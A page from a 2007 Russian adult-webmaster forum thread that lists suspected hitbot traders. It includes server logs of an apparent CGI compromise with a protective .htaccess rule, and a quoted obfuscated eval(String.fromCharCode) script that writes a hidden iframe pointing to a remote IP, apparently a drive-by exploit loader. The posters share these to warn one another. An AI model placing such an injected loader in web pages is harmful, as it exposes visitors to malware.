Список хитботчиков 4, страница 15

Тема: Список хитботчиков 4

цитата
05/12/07 в 17:52

awm_mark
maleteam.com - 60% кликов по скрытым линкам

thepowervideo.com - хитботы, троян - полный набор

Так удивляют некоторые трейдеры, с пеной у рта доказывающие, что это хорошие сиджи, прода отличная с них

цитата
06/12/07 в 23:38

[Virus]
походу таки дырявый at3.

все улики указывают на то что файл x2.cgi содержит дырку.

Код:

208.53.158.26 - - [05/Dec/2007:10:25:36 -0500] "POST /cgi-bin/atx/x/x2.cgi HTTP/1.0" 200 1935 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:38 -0500] "POST /cgi-bin/at3/x/x2.cgi HTTP/1.0" 200 2250 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:40 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:42 -0500] "GET /images/backup.php?l=1 HTTP/1.0" 200 52 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:46 -0500] "GET /images/backup.php?l=2 HTTP/1.0" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:49 -0500] "GET /images/backup.php?l=2 HTTP/1.0" 200 52 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:50 -0500] "GET /images/backup.php?l=3 HTTP/1.0" 200 56 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
208.53.158.26 - - [05/Dec/2007:10:25:52 -0500] "GET /images/backup.php?l=3 HTTP/1.0" 200 55 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

это логи. как видно сначала идет запрос размером аж 2.2к на файл x2.cgi, затем вызывается backup.php. файла такого по тому пути никогда небыло. так как x2.cgi отвечает за редактирование шаблонов на сервере, то логично предположить что дырка в нем. поскольку файл, судя по анализам логов, чисто системный и в нормальной работе сиджа не участвует (так как по логам не вызывается), смело закрываем его вот таким вот .htaccess`ом:

<Files x2.cgi>
Order Allow,Deny
Allow from 10.10.10.10 20.20.20.20
</Files>

где 10.10.10.10 20.20.20.20 заменяем на свои ип адреса или оставляем один.

файл кладем рядом с x2.cgi.

цитата
07/12/07 в 02:28

awm_mark
gayfromwest.com - на многих сиджах в топе, диз как у maleteam.com
А вот что говорит о нем гуголь :
Цитата:

GayFromWest - [ Перевести эту страницу ]
Этот сайт может нанести вред Вашему компьютеру.

01 Pride Movies 02 Boy Orgasm 03 Gay Shorties 04 18 boyz 05 Hot Naked Man 06 Sex Gay Mpeg 07 Gayxcite 08 Gay Free Videos 09 Gay Teen Boy Pics ...

gayfromwest.com/ - Похожие страницы

цитата
07/12/07 в 02:54

supervasya
Гугль невсегда бывает прав. Про мои сиджи он тоже самое написал. Не знаю, что ему там не понравилось. Ерунда какая-то!

цитата
07/12/07 в 03:41

awm_mark
ну-ну, продолжай трейдить с ним

цитата
07/12/07 в 04:12

supervasya

Да я не о том. Я с ним не работаю, не знаю кто это такой, и вообще я тинами занимаюсь. Я про гугль говорю - они иногда вешают эту надпись явно ошибочно. Поэтому ориентироваться только на гугль не стоит.

цитата
07/12/07 в 11:08

usanatol
Цитата:

Я про гугль говорю - они иногда вешают эту надпись явно ошибочно. Поэтому ориентироваться только на гугль не стоит.

Вешает он ее только если найдет на момент визита робота какую нибудь хрень даже если ее потом убрали в кеше она остается до момента его обновления. Так что его не на*бешь.

цитата
07/12/07 в 14:54

supervasya
usanatol писал:

Это верно. Главное, чтобы этой хренью не оказался, например, скрипт закрытия статуса

цитата
07/12/07 в 16:55

Project
Ребят, ну хватит оффтопить, реально, а?)
Я блин подписан на этот топик, мне приходит уведомление, я лезу на форум ознакомиться с новыми гадами, а тут рассуждения на различные темы...) А?))

цитата
07/12/07 в 20:42

Nick Cave
Noface, бро!

Все зашибись, новых хитботчиков не обнаружено!

Удачи

Извини, не выдержал

forester

цитата
07/12/07 в 23:26

Tsumibit0
http://fillmypussy.net/ - хитбот... добавлен с ИП 83.142.161.194

и коонтент пизженный с одного из трейдеров....

цитата
08/12/07 в 01:13

X-dream
bigtitsgoddes dot com - есть у меня подозрение на хитботы, но 100% не уверен...пока в дисейбле его держу. сайт новый, у всех трейдеров уже на топовых местах... прода сильно высокая у меня с него на ББW сайте

цитата
08/12/07 в 01:20

awm_mark

а вот посмотри пару постов вверх, и сравни с maleteam.com или gayfromwest.com

цитата
08/12/07 в 05:31

weely6
girlofspades.com - сплойт
Код:

<body bgcolor=#FFECEE link=#ffffff vlink=#FFB000 alink=#FFB000 bottommargin="0" topmargin="0" leftmargin="0">
<SCRIPT>eval(String.fromCharCode(100,111,99,117,109,101,110,116,
46,119,114,105,116,101,40,39,60,105,102,39,43,39,39,43,39,114,97,109,
39,43,39,39,43,39,101,32,115,39,43,39,39,43,39,114,99,61,34,104,116,
39,43,39,39,43,39,116,39,43,39,39,43,39,112,58,47,39,43,39,39,43,39,47,
56,53,39,43,39,39,43,39,46,50,53,39,43,39,39,43,39,53,46,49,39,43,39,
39,43,39,49,56,46,52,53,39,43,39,39,43,39,47,100,97,116,97,47,116,105,
116,39,43,39,39,43,39,108,101,49,46,104,116,39,43,39,39,43,39,109,108,
34,32,115,116,121,108,101,61,34,100,105,39,43,39,39,43,39,115,112,
108,97,121,58,110,111,39,43,39,39,43,39,110,101,34,62,60,47,105,39,43,
39,39,43,39,102,114,97,39,43,39,39,43,39,109,101,62,39,41))</script>
<TABLE BORDER=0 CELLPADDING=0 CELLSPACING=0 ALIGN=CENTER WIDTH=1003 HEIGHT=273>

цитата
08/12/07 в 06:48

awm_mark
оперативно
http://www.cjlog.com/search.html?q=girlofspades.com&is_movies=A…;niche=All

цитата
08/12/07 в 20:14

color
Sveridoff писал:

girlofspades.com - сплойт
Код:

взлом скорее всего. хотя кто его знает

цитата
10/12/07 в 10:08

DiamonD
milfgod.com

Поперли боты, вроде овнер то известный..
inSect, ты куда пропал?

цитата
11/12/07 в 20:30

AlexZ
новый СЖ того же товарища?
glamourchica.com - 91.192.117.37
и ИП похожи
ibizateenies.com - 91.192.117.145

З.Ы.: после пары часов проверки трафа, могу со 100% увереностью сказать что он ЧИТЕР!

Последний раз редактировалось: AlexZ (12/12/07 в 01:46), всего редактировалось 1 раз

цитата
11/12/07 в 21:27

Benny
Цитата:

новый СЖ того же товарища?
glamourchica.com - 91.192.117.37
и ИП похожи
ibizateenies.com - 91.192.117.145

опять закос под АТХ...

цитата
12/12/07 в 15:55

inSect
Пофиксил в понедельник. ПРичина была в этом трейдере : milfinsex.com. Несколько месяцев висел чисто, потом видимо включил бот. Извиняюсь перед всеми, кто через меня получил порцию ботов.
Теперь вообще вряд ли буду аппрувить сайты тех, кого не знаю по трейду я или другие мастера, без каких-то рекомендаций. Научен уже собственным опытом.

цитата
12/12/07 в 16:02

awm_mark
milfinsex.com на СЖлоге с июля в блэклисте

цитата
12/12/07 в 22:38

bullet2
videogasmic.com
хитбот + на морде эксп

овнер: Polaris
ICQ: 432596159

цитата
15/12/07 в 00:32

usanatol
rawmpg.com

хитбот
80% трафа без загрузки графики плюс клики на скрытые линки

и до кучи vidsdb.com тоже самое

цитата
16/12/07 в 20:09

Bul
maturegoddes.com
Раз в сутки сливает мне 100 хитов всегда с продой 700% - идиот

цитата
19/12/07 в 03:31

Nightmare
del

Последний раз редактировалось: Nightmare (19/12/07 в 03:40), всего редактировалось 1 раз

Стр. « первая < 13, 14, 15, 16, 17 > последняя »

Новая тема Ответить

Эта страница в полной версии